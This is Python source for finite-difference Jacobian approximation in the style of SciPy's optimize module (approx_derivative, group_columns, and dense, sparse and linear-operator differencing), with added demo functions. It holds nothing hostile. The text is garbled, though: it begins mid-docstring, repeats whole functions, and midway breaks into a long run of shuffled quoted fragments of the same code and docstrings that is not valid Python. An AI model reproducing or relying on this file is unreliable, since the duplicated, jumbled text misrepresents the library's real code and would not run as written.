        operator provides an efficient way of computing ``J.dot(p)`` for
        any vector ``p`` of shape (n,), but does not allow direct access
        to individual elements of the matrix. By default
        `as_linear_operator` is False.
    args, kwargs : tuple and dict, optional
        Additional arguments passed to `fun`. Both empty by default.
        The calling signature is ``fun(x, *args, **kwargs)``.

    Returns
    -------
    J : {ndarray, sparse matrix, LinearOperator}
        Finite difference approximation of the Jacobian matrix.
        If `as_linear_operator` is True returns a LinearOperator
        with shape (m, n). Otherwise it returns a dense array or sparse
        matrix depending on how `sparsity` is defined. If `sparsity` is
        None then an ndarray with shape (m, n) is returned. If `sparsity`
        is not None returns a csr_matrix with shape (m, n). For sparse
        matrices and linear operators it is always returned as a 2-D
        structure; for ndarrays, if m=1 it is returned as a 1-D gradient
        array with shape (n,).

    See Also
    --------
    check_derivative : Check correctness of a function computing
        derivatives.

    Notes
    -----
    If `rel_step` is not provided, it is assigned to ``EPS**(1/s)``, where
    EPS is machine epsilon for float64 numbers, s=2 for '2-point' method
    and s=3 for '3-point' method. Such relative step approximately
    minimizes a sum of truncation and round-off errors, see [1]_.

    A finite difference scheme for '3-point' method is selected
    automatically. The well-known central difference scheme is used for
    points sufficiently far from the boundary, and 3-point forward or
    backward scheme is used for points near the boundary. Both schemes
    have the second-order accuracy in terms of Taylor expansion. Refer to
    [2]_ for the formulas of 3-point forward and backward difference
    schemes.

    For dense differencing when m=1 Jacobian is returned with a shape
    (n,), on the other hand when n=1 Jacobian is returned with a shape
    (m, 1). Our motivation is the following: a) It handles a case of
    gradient computation (m=1) in a conventional way. b) It clearly
    separates these two different cases. c) In all cases np.atleast_2d
    can be called to get 2-D Jacobian with correct dimensions.

    References
    ----------
    .. [1] W. H. Press et. al. "Numerical Recipes. The Art of Scientific
           Computing. 3rd edition", sec. 5.7.

    .. [2] <NAME>, <NAME>, and <NAME>, "On the estimation of sparse
           Jacobian matrices", Journal of the Institute of Mathematics
           and its Applications, 13 (1974), pp. 117-120.

    .. [3] <NAME>, "Generation of Finite Difference Formulas on
           Arbitrarily Spaced Grids", Mathematics of Computation 51, 1988.

    Examples
    --------
    >>> import numpy as np
    >>> from scipy.optimize import approx_derivative
    >>>
    >>> def f(x, c1, c2):
    ...     return np.array([x[0] * np.sin(c1 * x[1]),
    ...                      x[0] * np.cos(c2 * x[1])])
    ...
    >>> x0 = np.array([1.0, 0.5 * np.pi])
    >>> approx_derivative(f, x0, args=(1, 2))
    array([[ 1.,  0.],
           [-1.,  0.]])

    Bounds can be used to limit the region of function evaluation.
    In the example below we compute left and right derivative at point 1.0.

    >>> def g(x):
    ...     return x**2 if x >= 1 else x
    ...
    >>> x0 = 1.0
    >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
    array([ 1.])
    >>> approx_derivative(g, x0, bounds=(1.0, np.inf))
    array([ 2.])
    """
    if method not in ['2-point', '3-point', 'cs']:
        raise ValueError("Unknown method '%s'. " % method)

    x0 = np.atleast_1d(x0)
    if x0.ndim > 1:
        raise ValueError("`x0` must have at most 1 dimension.")

    lb, ub = _prepare_bounds(bounds, x0)

    if lb.shape != x0.shape or ub.shape != x0.shape:
        raise ValueError("Inconsistent shapes between bounds and `x0`.")

    if as_linear_operator and not (np.all(np.isinf(lb))
                                   and np.all(np.isinf(ub))):
        raise ValueError("Bounds not supported when "
                         "`as_linear_operator` is True.")

    def fun_wrapped(x):
        f = np.atleast_1d(fun(x, *args, **kwargs))
        if f.ndim > 1:
            raise RuntimeError("`fun` return value has "
                               "more than 1 dimension.")
        return f

    if f0 is None:
        f0 = fun_wrapped(x0)
    else:
        f0 = np.atleast_1d(f0)
        if f0.ndim > 1:
            raise ValueError("`f0` passed has more than 1 dimension.")

    if np.any((x0 < lb) | (x0 > ub)):
        raise ValueError("`x0` violates bound constraints.")

    if as_linear_operator:
        if rel_step is None:
            rel_step = relative_step[method]

        return _linear_operator_difference(fun_wrapped, x0,
                                           f0, rel_step, method)
    else:
        h = _compute_absolute_step(rel_step, x0, method)

        if method == '2-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '1-sided', lb, ub)
        elif method == '3-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '2-sided', lb, ub)
        elif method == 'cs':
            use_one_sided = False

        if sparsity is None:
            return _dense_difference(fun_wrapped, x0, f0, h,
                                     use_one_sided, method)
        else:
            if not issparse(sparsity) and len(sparsity) == 2:
                structure, groups = sparsity
            else:
                structure = sparsity
                groups = group_columns(sparsity)

            if issparse(structure):
                structure = csc_matrix(structure)
            else:
                structure = np.atleast_2d(structure)

            groups = np.atleast_1d(groups)
            return _sparse_difference(fun_wrapped, x0, f0, h,
                                      use_one_sided, structure,
                                      groups, method)
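
# --- Editorial example (not part of the original module) ---
# A minimal sketch of `as_linear_operator=True`: the Jacobian is never
# formed explicitly, but products J.dot(p) are available at the cost of a
# couple of extra function evaluations per product. The helper name is
# hypothetical and the printed values are approximate.
def _demo_linear_operator():
    def f(x):
        return np.array([x[0] + 2 * x[1], np.sin(x[0]) * x[1]])

    x0 = np.array([0.5, 1.0])
    J_op = approx_derivative(f, x0, as_linear_operator=True)
    p = np.array([1.0, -1.0])
    # Analytically J = [[1, 2], [cos(0.5), sin(0.5)]], so J @ p is
    # approximately [-1.0, 0.398].
    print(J_op.dot(p))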

def _linear_operator_difference(fun, x0, f0, h, method):
    m = f0.size
    n = x0.size

    if method == '2-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p
            df = fun(x) - f0
            return df / dx

    elif method == '3-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = 2*h / norm(p)
            x1 = x0 - (dx/2)*p
            x2 = x0 + (dx/2)*p
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
            return df / dx

    elif method == 'cs':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p*1.j
            f1 = fun(x)
            df = f1.imag
            return df / dx

    else:
        raise RuntimeError("Never be here.")

    return LinearOperator((m, n), matvec)


def _dense_difference(fun, x0, f0, h, use_one_sided, method):
    m = f0.size
    n = x0.size
    J_transposed = np.empty((n, m))
    h_vecs = np.diag(h)

    for i in range(h.size):
        if method == '2-point':
            x = x0 + h_vecs[i]
            dx = x[i] - x0[i]  # Recompute dx as exactly representable number.
            df = fun(x) - f0
        elif method == '3-point' and use_one_sided[i]:
            x1 = x0 + h_vecs[i]
            x2 = x0 + 2 * h_vecs[i]
            dx = x2[i] - x0[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = -3.0 * f0 + 4 * f1 - f2
        elif method == '3-point' and not use_one_sided[i]:
            x1 = x0 - h_vecs[i]
            x2 = x0 + h_vecs[i]
            dx = x2[i] - x1[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
        elif method == 'cs':
            f1 = fun(x0 + h_vecs[i]*1.j)
            df = f1.imag
            dx = h_vecs[i, i]
        else:
            raise RuntimeError("Never be here.")

        J_transposed[i] = df / dx

    if m == 1:
        J_transposed = np.ravel(J_transposed)

    return J_transposed.T
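
# --- Editorial example (not part of the original module) ---
# A worked check of the one-sided 3-point stencil used by
# `_dense_difference` near a bound: df = -3*f0 + 4*f1 - f2 over dx = 2*h
# is second-order accurate, unlike the first-order 2-point forward
# difference. For f = exp at x0 = 0 the exact derivative is 1.
def _demo_one_sided_3point():
    h = 1e-4
    f = np.exp
    d_3pt = (-3 * f(0.0) + 4 * f(h) - f(2 * h)) / (2 * h)
    d_2pt = (f(h) - f(0.0)) / h
    # Errors are roughly 3e-9 and 5e-5 respectively.
    print(abs(d_3pt - 1.0), abs(d_2pt - 1.0))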

def _sparse_difference(fun, x0, f0, h, use_one_sided,
                       structure, groups, method):
    m = f0.size
    n = x0.size
    row_indices = []
    col_indices = []
    fractions = []

    n_groups = np.max(groups) + 1
    for group in range(n_groups):
        # Perturb variables which are in the same group simultaneously.
        e = np.equal(group, groups)
        h_vec = h * e
        if method == '2-point':
            x = x0 + h_vec
            dx = x - x0
            df = fun(x) - f0
            # The result is written to columns which correspond to perturbed
            # variables.
            cols, = np.nonzero(e)
            # Find all non-zero elements in selected columns of Jacobian.
            i, j, _ = find(structure[:, cols])
            # Restore column indices in the full array.
            j = cols[j]
        elif method == '3-point':
            # Here we do conceptually the same but separate one-sided
            # and two-sided schemes.
            x1 = x0.copy()
            x2 = x0.copy()

            mask_1 = use_one_sided & e
            x1[mask_1] += h_vec[mask_1]
            x2[mask_1] += 2 * h_vec[mask_1]

            mask_2 = ~use_one_sided & e
            x1[mask_2] -= h_vec[mask_2]
            x2[mask_2] += h_vec[mask_2]

            dx = np.zeros(n)
            dx[mask_1] = x2[mask_1] - x0[mask_1]
            dx[mask_2] = x2[mask_2] - x1[mask_2]

            f1 = fun(x1)
            f2 = fun(x2)

            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]

            mask = use_one_sided[j]
            df = np.empty(m)

            rows = i[mask]
            df[rows] = -3 * f0[rows] + 4 * f1[rows] - f2[rows]

            rows = i[~mask]
            df[rows] = f2[rows] - f1[rows]
        elif method == 'cs':
            f1 = fun(x0 + h_vec*1.j)
            df = f1.imag
            dx = h_vec
            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]
        else:
            raise ValueError("Never be here.")

        # All that's left is to compute the fraction. We store i, j and
        # fractions as separate arrays and later construct coo_matrix.
        row_indices.append(i)
        col_indices.append(j)
        fractions.append(df[i] / dx[j])

    row_indices = np.hstack(row_indices)
    col_indices = np.hstack(col_indices)
    fractions = np.hstack(fractions)
    J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))
    return csr_matrix(J)
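
# --- Editorial example (not part of the original module) ---
# A minimal sketch showing that `_sparse_difference` (reached through the
# `sparsity` argument of `approx_derivative`) agrees with dense
# differencing on a banded test function, while using only n_groups
# perturbations instead of n. The helper name and test function are
# illustrative.
def _demo_sparse_matches_dense():
    def f(x):
        # Component i couples x[i-1], x[i] and x[i+1]: tridiagonal Jacobian.
        y = x ** 2
        y[:-1] += x[1:]
        y[1:] -= 3 * x[:-1]
        return y

    x0 = np.linspace(-1.0, 1.0, 7)
    structure = np.eye(7) + np.eye(7, k=1) + np.eye(7, k=-1)
    J_dense = approx_derivative(f, x0)
    J_sparse = approx_derivative(f, x0, sparsity=structure)
    # The two estimates agree to roughly 1e-8 or better.
    print(np.max(np.abs(J_sparse.toarray() - J_dense)))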
- 'cs' -", "estimate its several columns by a single function evaluation [3]_.", "& fitting] *= -1 forward = (upper_dist >= lower_dist) &", "References ---------- .. [1] <NAME>, <NAME>, and <NAME>, \"On the", ": bool, optional When True the function returns an `scipy.sparse.linalg.LinearOperator`.", "x1 = x0.copy() x2 = x0.copy() mask_1 = use_one_sided &", "structure = csc_matrix(structure) else: structure = np.atleast_2d(structure) groups = np.atleast_1d(groups)", "dx[mask_2] = x2[mask_2] - x1[mask_2] f1 = fun(x1) f2 =", "groups are computed inside the function. A tuple is interpreted", "dx as exactly representable number. df = fun(x) - f0", "norm from scipy.sparse.linalg import LinearOperator from ..sparse import issparse, csc_matrix,", "scheme == '2-sided': central = (lower_dist >= h_total) & (upper_dist", ": None or array_like, optional Relative step size to use.", "terms of Taylor expansion. Refer to [2]_ for the formulas", "< lb) | (x0 > ub)): raise ValueError(\"`x0` violates bound", "as (structure, groups). If None (default), a standard dense differencing", "automatically. The well-known central difference scheme is used for points", "df = fun(x) - f0 elif method == '3-point' and", "/ num_steps adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central]", "x0.shape) if ub.ndim == 0: ub = np.resize(ub, x0.shape) return", "== 'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx", "to estimate the derivatives. Float will be converted to 1-D", "- f1[rows] elif method == 'cs': f1 = fun(x0 +", "perform such economic computations two ingredients are required: * structure", "of a function computing derivatives. Notes ----- If `rel_step` is", "'cs']: raise ValueError(\"Unknown method '%s'. \" % method) x0 =", "ub)): raise ValueError(\"`x0` violates bound constraints.\") if as_linear_operator: if rel_step", "central difference in interior points and the second order accuracy", "Such relative step approximately minimizes a sum of truncation and", "it returns a dense array or a sparse matrix depending", "Mathematics and its Applications, 13 (1974), pp. 117-120. .. [3]", "a ndarray with shape (m, n) is returned. If `sparsity`", "accuracy forward or backward difference. - '3-point' - use central", "abs(x0))``, possibly adjusted to fit into the bounds. For ``method='3-point'``", "... ]) ... >>> >>> x0 = np.array([1.0, 0.5 *", "x2 = x0 + 2 * h_vecs[i] dx = x2[i]", "m == 1: J_transposed = np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun,", "np.empty(m) rows = i[mask] df[rows] = -3 * f0[rows] +", "h_adjusted, use_one_sided relative_step = {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5}", "gradient) by comparison with a finite difference approximation. Parameters ----------", "'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx =", "= np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2]", "to which ith column assigned. The procedure was helpful only", "`fun` and `jac`. Both empty by default. The calling signature", "left is to compute the fraction. We store i, j", "if issparse(A): A = csc_matrix(A) else: A = np.atleast_2d(A) A", "* np.pi]) >>> check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\"", "array_like or sparse matrix of shape (m, n). A zero", "lower, then it is likely that your `jac` implementation is", "None (default), a standard dense differencing will be used. 
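# Illustrative sketch (not part of the module): how the adjustment behaves
# near a bound. The numbers are hand-picked and assume this module's
# namespace. A forward step 0.9 + 0.2 would violate ub, but the same step
# fits in the backward direction, so only the sign of h is flipped:
#
#   >>> x0, h = np.array([0.9]), np.array([0.2])
#   >>> lb, ub = np.array([0.0]), np.array([1.0])
#   >>> _adjust_scheme_to_bounds(x0, h, 1, '1-sided', lb, ub)
#   (array([-0.2]), array([ True]))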
relative_step = {"2-point": EPS**0.5,
                 "3-point": EPS**(1/3),
                 "cs": EPS**0.5}


def _compute_absolute_step(rel_step, x0, method):
    if rel_step is None:
        rel_step = relative_step[method]
    sign_x0 = (x0 >= 0).astype(float) * 2 - 1
    return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))


def _prepare_bounds(bounds, x0):
    lb, ub = [np.asarray(b, dtype=float) for b in bounds]
    if lb.ndim == 0:
        lb = np.resize(lb, x0.shape)
    if ub.ndim == 0:
        ub = np.resize(ub, x0.shape)
    return lb, ub
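# Illustrative sketch (not part of the module): the default absolute step.
# For '2-point' the relative step is EPS**0.5 ~ 1.5e-8, scaled by
# sign(x0) * max(1, |x0|), so (assuming this module's namespace):
#
#   >>> _compute_absolute_step(None, np.array([-3.0, 0.1]), '2-point')
#   array([ -4.47e-08,   1.49e-08])   # values shown approximately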
def group_columns(A, order=0):
    """Group columns of a 2-D matrix for sparse finite differencing [1]_.

    Two columns are in the same group if in each row at least one of them
    has zero. A greedy sequential algorithm is used to construct groups.

    Parameters
    ----------
    A : array_like or sparse matrix
        Matrix of which to group columns.
    order : int, iterable of int with shape (n,) or None
        Permutation array which defines the order of columns enumeration.
        If int or None, a random permutation is used with `order` used as
        a random seed. Default is 0, that is use a random permutation but
        guarantee repeatability.

    Returns
    -------
    groups : ndarray of int, shape (n,)
        Contains values from 0 to n_groups-1, where n_groups is the number
        of found groups. Each value ``groups[i]`` is an index of a group to
        which the ith column is assigned. The procedure is helpful only if
        n_groups is significantly less than n.

    References
    ----------
    .. [1] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
           sparse Jacobian matrices", Journal of the Institute of
           Mathematics and its Applications, 13 (1974), pp. 117-120.
    """
    if issparse(A):
        A = csc_matrix(A)
    else:
        A = np.atleast_2d(A)
        A = (A != 0).astype(np.int32)

    if A.ndim != 2:
        raise ValueError("`A` must be 2-dimensional.")

    m, n = A.shape

    if order is None or np.isscalar(order):
        rng = np.random.RandomState(order)
        order = rng.permutation(n)
    else:
        order = np.asarray(order)
        if order.shape != (n,):
            raise ValueError("`order` has incorrect shape.")

    A = A[:, order]

    if issparse(A):
        groups = group_sparse(m, n, A.indices, A.indptr)
    else:
        groups = group_dense(m, n, A)

    groups[order] = groups.copy()

    return groups
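# Usage sketch (illustrative): grouping columns of a tridiagonal sparsity
# pattern. Columns spaced three apart never share a row, so only a few
# groups are needed (3 with a favorable ordering); the exact assignment
# depends on the random permutation seeded by `order`.
#
#   >>> n = 8
#   >>> structure = np.eye(n) + np.eye(n, k=1) + np.eye(n, k=-1)
#   >>> groups = group_columns(structure)
#   >>> int(np.max(groups)) + 1   # number of groups, much less than n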
def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
                      bounds=(-np.inf, np.inf), sparsity=None,
                      as_linear_operator=False, args=(), kwargs={}):
    """Compute finite difference approximation of the derivatives of a
    vector-valued function.

    If a function maps from R^n to R^m, its derivatives form an m-by-n
    matrix called the Jacobian, where an element (i, j) is a partial
    derivative of f[i] with respect to x[j].

    Parameters
    ----------
    fun : callable
        Function of which to estimate the derivatives. The argument x
        passed to this function is ndarray of shape (n,) (never a scalar
        even if n=1). It must return 1-D array_like of shape (m,) or a
        scalar.
    x0 : array_like of shape (n,) or float
        Point at which to estimate the derivatives. Float will be converted
        to a 1-D array.
    method : {'3-point', '2-point', 'cs'}, optional
        Finite difference method to use:
            - '2-point' - use the first order accuracy forward or backward
              difference.
            - '3-point' - use central difference in interior points and the
              second order accuracy forward or backward difference near the
              boundary.
            - 'cs' - use a complex-step finite difference scheme. This
              assumes that the user function is real-valued and can be
              analytically continued to the complex plane. Otherwise,
              produces bogus results.
    rel_step : None or array_like, optional
        Relative step size to use. The absolute step size is computed as
        ``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
        fit into the bounds. For ``method='3-point'`` the sign of `h` is
        ignored. If None (default) then step is selected automatically,
        see Notes.
    f0 : None or array_like, optional
        If not None it is assumed to be equal to ``fun(x0)``, in this case
        the ``fun(x0)`` is not called. Default is None.
    bounds : tuple of array_like, optional
        Lower and upper bounds on independent variables. Defaults to no
        bounds. Each bound must match the size of `x0` or be a scalar, in
        the latter case the bound will be the same for all variables. Use
        it to limit the range of function evaluation. Bounds checking is
        not implemented when `as_linear_operator` is True.
    sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
        Defines a sparsity structure of the Jacobian matrix. If the
        Jacobian matrix is known to have only few non-zero elements in
        each row, then it's possible to estimate its several columns by a
        single function evaluation [3]_. To perform such economic
        computations two ingredients are required:

        * structure : array_like or sparse matrix of shape (m, n). A zero
          element means that a corresponding element of the Jacobian
          identically equals to zero.
        * groups : array_like of shape (n,). A column grouping for a given
          sparsity structure, use `group_columns` to obtain it.

        A single array or a sparse matrix is interpreted as a sparsity
        structure, and groups are computed inside the function. A tuple is
        interpreted as (structure, groups). If None (default), a standard
        dense differencing will be used.

        Note that sparse differencing makes sense only for large Jacobian
        matrices where each row contains few non-zero elements.
    as_linear_operator : bool, optional
        When True the function returns an `scipy.sparse.linalg.LinearOperator`.
        Otherwise it returns a dense array or a sparse matrix depending on
        `sparsity`. The linear operator provides an efficient way of
        computing ``J.dot(p)`` for any vector ``p`` of shape (n,), but does
        not allow direct access to individual elements of the matrix. By
        default `as_linear_operator` is False.
    args, kwargs : tuple and dict, optional
        Additional arguments passed to `fun`. Both empty by default.
        The calling signature is ``fun(x, *args, **kwargs)``.

    Returns
    -------
    J : {ndarray, sparse matrix, LinearOperator}
        Finite difference approximation of the Jacobian matrix.
        If `as_linear_operator` is True returns a LinearOperator with shape
        (m, n). Otherwise it returns a dense array or sparse matrix
        depending on how `sparsity` is defined. If `sparsity` is None then
        an ndarray with shape (m, n) is returned. If `sparsity` is not None
        returns a csr_matrix with shape (m, n). For sparse matrices and
        linear operators it is always returned as a 2-D structure, for
        ndarrays, if m=1 it is returned as a 1-D gradient array with shape
        (n,).

    See Also
    --------
    check_derivative : Check correctness of a function computing
                       derivatives.

    Notes
    -----
    If `rel_step` is not provided, it is assigned to ``EPS**(1/s)``, where
    EPS is machine epsilon for float64 numbers, s=2 for '2-point' method
    and s=3 for '3-point' method. Such relative step approximately
    minimizes a sum of truncation and round-off errors, see [1]_.

    A finite difference scheme for '3-point' method is selected
    automatically. The well-known central difference scheme is used for
    points sufficiently far from the boundary, and 3-point forward or
    backward scheme is used for points near the boundary. Both schemes
    have second-order accuracy in terms of Taylor expansion. Refer to [2]_
    for the formulas of 3-point forward and backward difference schemes.

    For dense differencing when m=1 Jacobian is returned with a shape
    (n,), on the other hand when n=1 Jacobian is returned with a shape
    (m, 1). Our motivation is the following: a) It handles a case of
    gradient computation (m=1) in a conventional way. b) It clearly
    separates these two different cases. c) In all cases np.atleast_2d can
    be called to get 2-D Jacobian with correct dimensions.

    References
    ----------
    .. [1] W. H. Press et al. "Numerical Recipes. The Art of Scientific
           Computing. 3rd edition", sec. 5.7.

    .. [2] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
           sparse Jacobian matrices", Journal of the Institute of
           Mathematics and its Applications, 13 (1974), pp. 117-120.

    .. [3] B. Fornberg, "Generation of Finite Difference Formulas on
           Arbitrarily Spaced Grids", Mathematics of Computation 51, 1988.

    Examples
    --------
    >>> import numpy as np
    >>> from scipy.optimize import approx_derivative
    >>>
    >>> def f(x, c1, c2):
    ...     return np.array([x[0] * np.sin(c1 * x[1]),
    ...                      x[0] * np.cos(c2 * x[1])])
    ...
    >>> x0 = np.array([1.0, 0.5 * np.pi])
    >>> approx_derivative(f, x0, args=(1, 2))
    array([[ 1.,  0.],
           [-1.,  0.]])

    Bounds can be used to limit the region of function evaluation.
    In the example below we compute left and right derivatives at
    point 1.0.

    >>> def g(x):
    ...     return x**2 if x >= 1 else x
    ...
    >>> x0 = 1.0
    >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
    array([ 1.])
    >>> approx_derivative(g, x0, bounds=(1.0, np.inf))
    array([ 2.])
    """
    if method not in ['2-point', '3-point', 'cs']:
        raise ValueError("Unknown method '%s'." % method)

    x0 = np.atleast_1d(x0)
    if x0.ndim > 1:
        raise ValueError("`x0` must have at most 1 dimension.")

    lb, ub = _prepare_bounds(bounds, x0)

    if lb.shape != x0.shape or ub.shape != x0.shape:
        raise ValueError("Inconsistent shapes between bounds and `x0`.")

    if as_linear_operator and not (np.all(np.isinf(lb))
                                   and np.all(np.isinf(ub))):
        raise ValueError("Bounds not supported when "
                         "`as_linear_operator` is True.")

    def fun_wrapped(x):
        f = np.atleast_1d(fun(x, *args, **kwargs))
        if f.ndim > 1:
            raise RuntimeError("`fun` return value has "
                               "more than 1 dimension.")
        return f

    if f0 is None:
        f0 = fun_wrapped(x0)
    else:
        f0 = np.atleast_1d(f0)
        if f0.ndim > 1:
            raise ValueError("`f0` passed has more than 1 dimension.")

    if np.any((x0 < lb) | (x0 > ub)):
        raise ValueError("`x0` violates bound constraints.")

    if as_linear_operator:
        if rel_step is None:
            rel_step = relative_step[method]

        return _linear_operator_difference(fun_wrapped, x0,
                                           f0, rel_step, method)
    else:
        h = _compute_absolute_step(rel_step, x0, method)

        if method == '2-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '1-sided', lb, ub)
        elif method == '3-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '2-sided', lb, ub)
        elif method == 'cs':
            use_one_sided = False

        if sparsity is None:
            return _dense_difference(fun_wrapped, x0, f0, h,
                                     use_one_sided, method)
        else:
            if not issparse(sparsity) and len(sparsity) == 2:
                structure, groups = sparsity
            else:
                structure = sparsity
                groups = group_columns(sparsity)

            if issparse(structure):
                structure = csc_matrix(structure)
            else:
                structure = np.atleast_2d(structure)

            groups = np.atleast_1d(groups)
            return _sparse_difference(fun_wrapped, x0, f0, h,
                                      use_one_sided, structure,
                                      groups, method)
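# Usage sketch (illustrative): sparse differencing with a known structure.
# `f_tri` is a hypothetical helper with a tridiagonal Jacobian, so all of
# its columns can be recovered in n_groups function evaluations instead
# of n (assuming this module's namespace):
#
#   >>> def f_tri(x):
#   ...     out = 3.0 * x**2
#   ...     out[:-1] += x[1:]        # f[i] also depends on x[i+1]
#   ...     out[1:] -= 2.0 * x[:-1]  # ... and on x[i-1]
#   ...     return out
#   ...
#   >>> n = 100
#   >>> structure = np.eye(n) + np.eye(n, k=1) + np.eye(n, k=-1)
#   >>> groups = group_columns(structure)
#   >>> J = approx_derivative(f_tri, np.ones(n),
#   ...                       sparsity=(structure, groups))
#   >>> J.nnz   # csr_matrix with 3*n - 2 stored entries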
def _linear_operator_difference(fun, x0, f0, h, method):
    m = f0.size
    n = x0.size

    if method == '2-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p
            df = fun(x) - f0
            return df / dx

    elif method == '3-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = 2*h / norm(p)
            x1 = x0 - (dx/2)*p
            x2 = x0 + (dx/2)*p
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
            return df / dx

    elif method == 'cs':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p*1.j
            f1 = fun(x)
            df = f1.imag
            return df / dx

    else:
        raise RuntimeError("Never be here.")

    return LinearOperator((m, n), matvec)
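# Usage sketch (illustrative): matrix-free products with the Jacobian,
# reusing the hypothetical `f_tri` from the sketch above. Each J.dot(p)
# costs one extra function evaluation for '2-point' (two for '3-point'),
# without ever forming J; remember bounds are not supported here.
#
#   >>> J_op = approx_derivative(f_tri, np.ones(100),
#   ...                          as_linear_operator=True)
#   >>> p = np.ones(100)
#   >>> Jp = J_op.dot(p)   # directional derivative along p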
def _dense_difference(fun, x0, f0, h, use_one_sided, method):
    m = f0.size
    n = x0.size
    J_transposed = np.empty((n, m))
    h_vecs = np.diag(h)

    for i in range(h.size):
        if method == '2-point':
            x = x0 + h_vecs[i]
            dx = x[i] - x0[i]  # Recompute dx as exactly representable number.
            df = fun(x) - f0
        elif method == '3-point' and use_one_sided[i]:
            x1 = x0 + h_vecs[i]
            x2 = x0 + 2 * h_vecs[i]
            dx = x2[i] - x0[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = -3.0 * f0 + 4 * f1 - f2
        elif method == '3-point' and not use_one_sided[i]:
            x1 = x0 - h_vecs[i]
            x2 = x0 + h_vecs[i]
            dx = x2[i] - x1[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
        elif method == 'cs':
            f1 = fun(x0 + h_vecs[i]*1.j)
            df = f1.imag
            dx = h_vecs[i, i]
        else:
            raise RuntimeError("Never be here.")

        J_transposed[i] = df / dx

    if m == 1:
        J_transposed = np.ravel(J_transposed)

    return J_transposed.T
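# Illustrative sketch: accuracy of the three methods on a smooth function.
# The error magnitudes are rough orders, consistent with the EPS**(1/2)
# and EPS**(1/3) step selection discussed in the Notes of
# `approx_derivative`; 'cs' reaches machine precision for analytic
# functions.
#
#   >>> for method in ['2-point', '3-point', 'cs']:
#   ...     d = approx_derivative(np.exp, 1.0, method=method)
#   ...     print(method, abs(d - np.exp(1.0)))   # ~1e-8, ~1e-11, ~1e-16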
bounds : 2-tuple of array_like,", "(upper_dist < lower_dist) & ~central h_adjusted[backward] = -np.minimum( h[backward], 0.5", "`as_linear_operator` is False. args, kwargs : tuple and dict, optional", "fitting] *= -1 forward = (upper_dist >= lower_dist) & ~fitting", "df = f2 - f1 elif method == 'cs': f1", "central difference scheme is used for points sufficiently far from", "appropriate shape. x0 : array_like of shape (n,) or float", "bounds. Parameters ---------- x0 : ndarray, shape (n,) Point at", "assigned to ``EPS**(1/s)``, where EPS is machine epsilon for float64", "forward = (upper_dist >= lower_dist) & ~central h_adjusted[forward] = np.minimum(", "is used for points sufficiently far from the boundary, and", "None returns a csr_matrix with shape (m, n). For sparse", "method not in ['2-point', '3-point', 'cs']: raise ValueError(\"Unknown method '%s'.", "== '3-point' and use_one_sided[i]: x1 = x0 + h_vecs[i] x2", "np.array([x[0] * np.sin(c1 * x[1]), ... x[0] * np.cos(c2 *", "J_transposed[i] = df / dx if m == 1: J_transposed", "(x < lb) | (x > ub) fitting = np.abs(h_total)", "import norm from scipy.sparse.linalg import LinearOperator from ..sparse import issparse,", "function. A tuple is interpreted as (structure, groups). If None", "is interpreted as a sparsity structure, and groups are computed", "standard dense differencing will be used. Note, that sparse differencing", "np.minimum( h[forward], 0.5 * upper_dist[forward] / num_steps) use_one_sided[forward] = True", "= -3 * f0[rows] + 4 * f1[rows] - f2[rows]", "conventional way. b) It clearly separates these two different cases.", "method == '2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1,", "if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = 2*h / norm(p)", "+ 4 * f1 - f2 elif method == '3-point'", "for `jac`. Returns ------- accuracy : float The maximum among", "of Finite Difference Formulas on Arbitrarily Spaced Grids\", Mathematics of", "np.minimum(upper_dist, lower_dist) / num_steps adjusted_central = (~central & (np.abs(h_adjusted) <=", "1 for group in range(n_groups): # Perturb variables which are", "`h` is ignored. If None (default) then step is selected", "or sparse matrix of shape (m, n). A zero element", "division import numpy as np from numpy.linalg import norm from", "x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if method not in", "algorithm is used to construct groups. Parameters ---------- A :", "return np.zeros(m) dx = h / norm(p) x = x0", "`jac` implementation is correct. See Also -------- approx_derivative : Compute", "2 means that we need to evaluate f(x0 + 2", "= x0 